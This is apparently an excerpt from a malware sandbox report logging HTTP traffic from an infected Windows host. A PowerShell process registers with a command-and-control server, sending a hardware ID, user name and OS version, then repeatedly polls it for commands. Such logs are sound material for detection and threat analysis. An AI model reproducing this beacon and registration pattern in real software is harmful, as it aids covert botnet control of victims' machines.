Jan 4, 2021 19:17:36.984596014 CET	1386	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:37.062094927 CET	1387	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703781fe0000d6d90c95e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=drythXUkXeaFiujYhRNxcdJV%2FELlVPJz1zsrBvFtAHFs7Bs7bkgHq1sGeT1pLmySQyj2JF3TUynCFt5vwHTs2hJ%2BWANxTQ8jiV7yjwN9mQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5166808d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:37.065628052 CET	1388	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:37.140665054 CET	1388	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703782500000d6d92a830000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sIdv%2BIy0VCur7Z0XVmEMtQynrP2AsCNrgSMgjdW2dBQyPPJBTov%2BkoVz9fRhSRk8%2BJlQOXqx83Xp0uOjGu96thJeq3FLOBnBdlya4rcrjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f516e902d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:37.144450903 CET	1389	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:37.223587990 CET	1389	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037829d0000d6d95a8ea000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fCWY1vcAqF8Ckfgn0cqrMS9J2FZod%2B%2FLmRRhwQ97Pv9MTUHYDHmRCn474r0KkOMgnsMM76K%2FfgGLxSKhe0J1UAkpmqt1oJtL3Nb1yLL0mQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f5176a16d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:37.227199078 CET	1390	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:37.304352999 CET	1390	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703782f30000d6d9641b2000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MdZWur8T4k4CIG9AuVPBbWoQVnnc7kXg02t9TvnGWkfUFiHp7QzS5PMJRaNQ%2BUMwyRfEbGtXoL7ihPLRAwju41wzk5cqE6CHw8pe%2FsNrTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f517eb58d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.314454079 CET	1394	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.752201080 CET	1395	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703796d00000d6d946bdf000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6lBSLeMcW7xdsJmQdcpsG3SNFZqx15r5LJcMt%2BkvmVJMETicgGGMgc1U89SaX8WLW8z1PzaSJeBbHwa31HMRka%2BkAIVNhFWuRAIZNdtX0Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f537b81ad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.754302979 CET	1395	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.879127979 CET	1396	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703798890000d6d95aa6a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fsd6buSFvoVzRQ6KvrhQvQOHTdNQ5Ha7xeOCLgwS7gADsJPdOkJvpU2h9lPOwZZ%2FZaqiayvntBDyFZ8BXTOqF5feh3RWNfmbFm1Pf5mRrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f53a7e65d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.880933046 CET	1397	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:42.961236954 CET	1398	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703799070000d6d93d089000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1BedpwdqxV%2F7KQhtoqfMh5Zt8mmYokZkgu8jteiprRWdKR3pBReAHpLA6reJ%2BGwEs%2Ft%2FYNEA%2BvZkgt%2FA%2FWJtm%2F6mRvs2EzW1umvwbXZL2g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f53b3899d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:42.963814974 CET	1398	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:43.050457001 CET	1399	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703799590000d6d96f2bd000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iywNrTeI7sxR7OQGUPHAk0ZpTleY2dzTA8E%2By2zVCFLG1X9Ejr24dO3i4MdUdlQlbcdsypCv%2F6O2o0lemFUxCSdLvqMvpqoqXIDanyZOHQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f53bc9cad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49172	172.67.167.122	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 4, 2021 19:17:03.754157066 CET	1333	OUT	POST /cc/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: http generic Host: cryptodual.net Content-Length: 87 Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161 Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Jan 4, 2021 19:17:04.564491987 CET	1335	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703700320000c7791b2e2000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Cz7EWrbN9xQh4kps12fPCRFQ3osexibxcm6zR3xWr1EwKek4CEkcp8zXuVQHHw6QvLizC5vQtj0jgHGK7dTr0b9XGHRk%2Fc7%2BdtH%2BtQ6A9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f446b912c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.565768003 CET	1335	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.693449020 CET	1337	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703703590000c77922830000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=78Z5%2BwNS7NkCmclhiI7zPw2XGlmibN1X7QoeuGNpRt18SNfjpSv%2FhfabQLYg1%2BBxfu%2FMAmV%2FLpSBVGBFfc5sYU6lIAyO7OFEOfxBWtJ%2Biw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44bcba9c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.694196939 CET	1337	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.790327072 CET	1339	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703703da0000c77935ba1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8g8rxMEiuQ9tea3a6f07WDlalZ8qSX8XpMMcdymkxvS%2B20r6wVhopeguxCp7RXMUXEo%2BSPwPxTsRpJvZAk1oxn1%2FiszNSmfBAByQTq3OMQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44c9dbec779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.791111946 CET	1339	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.888597012 CET	1341	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037043b0000c77973234000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VwtpS0as2n8ynSy2FCCAZNIdrplz9oqmyu1GyexDcsxu%2FdM9sZQDDCfWuyW7n3rS6usJenO4wPrYMvcZo%2FHMv30bI68WdSeN03TQamZZcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44d2ef8c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:04.889750957 CET	1341	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:04.957537889 CET	1342	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037049d0000c77923094000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zjam79sGZYn1izs18lV8j1DWwd5S5m0P0MWGsKSp27b2T1X%2FYYzcxUW4Y9splBZQfye8hYbkI%2Boxzltu0h3vsO%2BR95jTq3dnROp6J%2B1pEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f44dc85cc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:09.952816010 CET	1343	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:10.014244080 CET	1345	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703718640000c7793d174000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9TAFY%2FSbMRHEesT%2FfHI8u%2BbecPJae%2Bk7mfxqzpmsIqLtjaGsAS%2FsfjbYZSsEBQ0AADynP8AYV1H51hiEVyKSOyCO21B5VgbBy8IB4xObnA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46d6b94c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:10.015170097 CET	1345	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:10.085484028 CET	1347	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703718a40000c779383cf000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fj%2B7Z2HN6bffQZUS0mg5dM%2FBmkFKGYbQC2lPrsXOnMkCNL78DaCMIm5J9gT0hfp2a0V9H1u1hv0uJqgFvLcxso45md2emEJXAxO%2BpzVNCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46ddc58c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:10.086371899 CET	1347	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:10.154727936 CET	1349	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703718eb0000c77948a53000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qMNAta6Oht%2FrLDycc3mepwYh5YPGZrC%2Fk%2Bq4sNXezsYcP0%2ByeUAsD7qpjFlv15Flti%2BXJJnPiirHZo4ta%2BoaxIlGvaXB9nhT8joUwJ%2BCNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46e4d4dc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:10.155527115 CET	1349	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:10.224998951 CET	1350	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077037192f0000c7795d3ed000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=KwtLrO5l1f5FXbedMUUNfpSaunC03AjKEc%2Fo7vMjhDd0E0NHd%2B7Kvd7WQyGLjjydiuYVMAuxWznHmKOqXY22OaSBS9lKwPlM4hVPLJ%2BwWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f46ebe1ac779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.225049973 CET	1350	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.295845985 CET	1352	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372cff0000c77984837000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QkU%2BTqYc0pwT7xzyOtrjCpThm3e0GxCbIjXryfdnR8WqgMqhHptrSwRLMZd0M13gNyJmk0%2BOAWu4VwwJG7rVhsK7cW3c%2B5trN1XxFY8l2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48e6f75c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.296494961 CET	1352	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.366817951 CET	1354	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372d440000c779292c4000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LfAMS52yt9aunMABIy6xDZvLdSjFg4UW54%2B3KcQLRFg3RqrajDKgaKnRQOa05xIgYBhtwDg0id%2Bl0AiNbpq%2BZbfIRcxCcXQJM1DbpVQEBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48ed832c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.367356062 CET	1354	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.429128885 CET	1356	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372d8b0000c77938185000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Bvyug64DinJR3k8%2FV6zPCYgZpCaMH3v0CP0BIYZTtBLEvootvRy%2BO%2Bxum948rr1WkPHdm7P%2FvSAYgM26e%2BhLouxB00igdwIWydYoXZgE3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48f48ffc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:15.429739952 CET	1356	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:15.504028082 CET	1357	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770372dcc0000c77981820000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cCBZ0ZhIfMiy9RSUyjZ%2FmVsZ5JS1yoUwFTZJQBtpyccaoi1cwwKsWT9NmeskCzlcgbMoxJW%2BOZ6QdHPnv8a3fHAiAb%2F%2FE1yjzxzOeqNHbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f48fa9b2c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.499825954 CET	1358	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.593302965 CET	1359	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703741980000c77961194000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZFIfVIoDJaEr%2B9F%2B0%2F4CynER1iKMIHfvx1IebVTnEM1kn3g6Wwup6SZKIN%2F6ikhBVrnEXb7FY1VM3IpsWzXvzuxgIoLDyDvUbn%2Bh8r%2Fq6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4af5beec779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.594125986 CET	1359	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.655513048 CET	1361	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703741f70000c77931245000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=APeIdhXRZy1KaNAj5RXYe%2Fi9NM%2FC7DxeS1kgg%2FGobAKIbJ2CkGkLgW%2FeCsCu1ZtSbgV1ZMiKVvQsGw5gJYo5Xd1PkI0%2FwQolQ%2Fd1hscwtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4afed3cc779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:17:20.656460047 CET	1362	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:17:20.718929052 CET	1363	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:17:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703742350000c77963bb5000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fnsuv5ri7ZUTyU0BvjtSHBrjaun2CUUzheXOUcDuXrr%2BRjIiw0ewWuErs5HoCiyVcxc829%2FdcUq%2Bcm0v1gvoY5HS1PrYWvMkPyFu04Ak7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4b05e10c779-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
